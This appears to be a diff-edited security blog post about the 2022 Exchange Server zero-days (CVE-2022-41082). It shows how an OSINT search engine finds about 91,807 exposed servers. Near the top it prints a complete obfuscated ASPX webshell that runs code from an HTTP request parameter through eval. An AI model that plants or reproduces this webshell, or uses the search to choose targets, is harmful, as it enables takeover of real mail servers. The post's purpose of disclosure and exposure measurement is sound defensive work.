On September 30, 2022, Microsoft announced security updates for two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, 2016, and 2019.

 #Server Requested Webshell <%@Page Language="Jscript"%> <%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>

-Detect Exploitable MS Exchange Servers using OSINT Tools
+Detect Exploitable Microsoft Exchange Servers Using OSINT Tools

-Users can identify Exchange Servers with MS Exchange Zero Day vulnerabilities using Criminal IP (https://www.criminalip.io).
+Users can search Exchange servers with Exchange zero-day vulnerabilities using Criminal IP (https://www.criminalip.io).
 Use the cve_id filter and search for CVE-2022-41082 vulnerabilities.
-Searching for this vulnerability will yield a total of 91,807 IP address hosting vulnerable Exchange Servers.
+Searching for this vulnerability will yield 91,807 IP addresses hosting vulnerable Exchange servers.

-Port statistics show that most IP addresses with MS Exchange Zero-day vulnerabilities usually have both 80/443 ports exposed.
-Other open ports are often variations of %443, such as 8443, 4433 etc.
+Port statistics show that most IP addresses with Microsoft Exchange zero-day vulnerabilities usually have both 80/443 ports exposed.
+Other open ports are often variations of %443, such as 8443, 4433, etc.

-Furthermore, we can see that some IP addresses still operating in a vulnerable state due to weak certificates.
+Furthermore, we can see that some IP addresses are still operating in a vulnerable state with weak certificates.